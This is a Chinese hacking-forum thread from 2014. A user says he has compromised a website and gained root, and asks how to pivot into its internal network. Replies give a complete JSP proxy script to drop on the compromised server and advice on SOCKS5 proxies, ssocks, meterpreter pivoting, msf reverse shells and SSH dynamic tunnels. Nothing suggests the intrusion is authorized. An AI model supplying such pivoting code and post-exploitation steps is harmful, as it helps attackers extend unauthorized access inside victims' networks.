疯子求助-梧桐雨解答的jsp proxy

关于linux shell 内网如何做代理

疯子 (世人笑我太疯癫,我笑世人看不穿。) | 2014-05-30 20:24

最近渗透一个网站 拿到一个shell  root权限 已提权

现在想渗透内网  想做一个代理并且扫描内网 可是一直找不到怎么做内网代理 求个好方法 谢谢 !

有好方法的或者成功的 WB 感谢!

取消收藏 感谢(1)
分享到: 1
24 个回复
  1. 1# 感谢(1) 梧桐雨 (‮ofni.uygnotuw‮) | 2014-05-30 20:29

    如果想漫游内网的话 在服务器上弄个sock5代理就好了。

    参考例子:
    http://zone.wooyun.org/content/1693
    linux基本上支持python的,只要支持,那么可以试试80vul的 python socks5代理。客户端推荐用:Proxycap

    如果是php,就很简单了,很多代理可扫描内网的。百度一下就有许多,结合自己实际情况改改就可以用了。

  2. 2# 梧桐雨 (‮ofni.uygnotuw‮) | 2014-05-30 20:31

    80vul 的 socks5代理用法 python 文件名 你想要开的端口

    例子 : python socks5.py 9999

  3. 3# 疯子 (世人笑我太疯癫,我笑世人看不穿。) | 2014-05-30 20:37

    @梧桐雨 每次都是妹子你来帮我,都不知道怎么说了,小小的1WB不成敬意!

  4. 4# xiaoL (http://www.xlixli.net) | 2014-05-30 20:37

    @梧桐雨 梧桐雨什么的最有爱了

  5. 5# 感谢(1) 疯子 (世人笑我太疯癫,我笑世人看不穿。) | 2014-05-30 20:38

    还有好的想法的 小伙伴们也共享出来 我们一起漫游内网!

  6. 6# 疯子 (世人笑我太疯癫,我笑世人看不穿。) | 2014-05-30 20:39

    @梧桐雨 恩 我这个是JAVA的tomcat jsp  所以我试一下80vul的  谢谢!

  7. 7# 梧桐雨 (‮ofni.uygnotuw‮) | 2014-05-30 20:43

    @疯子 jsp一个很简单的proxy,只要用力把它甩到目标服务器上,然后这么访问:proxy.jsp?http://10.0.10.10 就可以进行漫游了,不过有些内部资源可能加载不出来。
    <%@page session="false"%>
    <%@page import="java.net.*,java.io.*" %>
    <%
    try {
      String reqUrl = request.getQueryString();
      
      URL url = new URL(reqUrl);
      HttpURLConnection con = (HttpURLConnection)url.openConnection();
      con.setDoOutput(true);
      con.setRequestMethod(request.getMethod());
      int clength = request.getContentLength();
      if(clength > 0) {
        con.setDoInput(true);
        byte[] idata = new byte[clength];
        request.getInputStream().read(idata, 0, clength);
        con.getOutputStream().write(idata, 0, clength);
      }
      response.setContentType(con.getContentType());

      BufferedReader rd = new BufferedReader(new InputStreamReader(con.getInputStream()));
      String line;
      while ((line = rd.readLine()) != null) {
        out.println(line);
      }
      rd.close();

    } catch(Exception e) {
      response.setStatus(500);
    }
    %>

    把上面的代码保存成jsp就可以了。

  8. 8# 疯子 (世人笑我太疯癫,我笑世人看不穿。) | 2014-05-30 20:45

    @梧桐雨 好的 我主要还是要做扫描 所以还是用socks5  谢谢!

  9. 9# 冷冷的夜 (1) | 2014-05-30 21:35

    meterpreter

  10. 10# DM_ (http://x0day.me) | 2014-05-30 22:39

    meta_ssh

  11. 11# Kuuki | 2014-05-30 22:43

    @疯子 丢一个ssocks-0.0.14.tar.gz进去 之前用过 感觉不错

  12. 12# laterain | 2014-05-30 23:00

    ssh 做socks4代理,稳定,不漏气
    没有破解密码吗?请移步http://drops.wooyun.org/tips/1951

  13. 13# 疯子 (世人笑我太疯癫,我笑世人看不穿。) | 2014-05-30 23:24

    @Kuuki 刚刚用了  发现存在一个问题 我是路由器上网的  ssocks 无法代理到我的内网  端口映射也不行 不知什么问题

  14. 14# wefgod (求大牛指点) | 2014-05-30 23:44

    @laterain 洞主说的是内网。

  15. 15# Kuuki | 2014-05-31 00:00

    @疯子 应该没问题。我当时也是路由上网,我还是映射到我虚拟机里呢,你把dmz那些关了,只开端口映射

  16. 16# 乌帽子 (业精于勤而荒于嬉,行成于思而毁于随。) | 2014-05-31 00:53

    meterpreter+povit+socks4

  17. 17# Sct7p (.)V(.) (.)_(.) (.)*(.) (.)^(.) (|)(and 1=2)(|) (.)^(.) (.)*(.) (.)_(.) (.)V(.) | 2014-05-31 02:32

    SSH

  18. 18# Xser (一枚屌丝) | 2014-05-31 07:29

    用msf直接生成一个shell,然后反弹就是了

  19. 19# saline (碧池就是碧池) | 2014-05-31 11:27

    meterpreter不是应该很好的选择么。

  20. 20# debug | 2014-05-31 15:30

    假如拿到的服务器内网 那就用的反向代理   拿到是外网就正向的代理  socket5  msf都可以的,

  21. 21# BlAck.Eagle | 2014-06-03 23:37

    你没感觉代理好卡?

  22. 22# 煦阳。 | 2014-06-04 02:00

    如果可以直接ssh的话.. putty直接就可以代理的.
    我是说如果可以直接ssh的。

  23. 23# gerfalke | 2014-06-07 12:09

    ssocks这个工具挺好用的,可以正向也可以反弹的

  24. 24# 小森森 (学习中……) | 2014-06-07 13:54

    ssh啊。。。
    ssh -D 1080 host
    在本机开一个1080的socks5,通过ssh隧道代理

你可能感兴趣的:(疯子求助-梧桐雨解答的jsp proxy)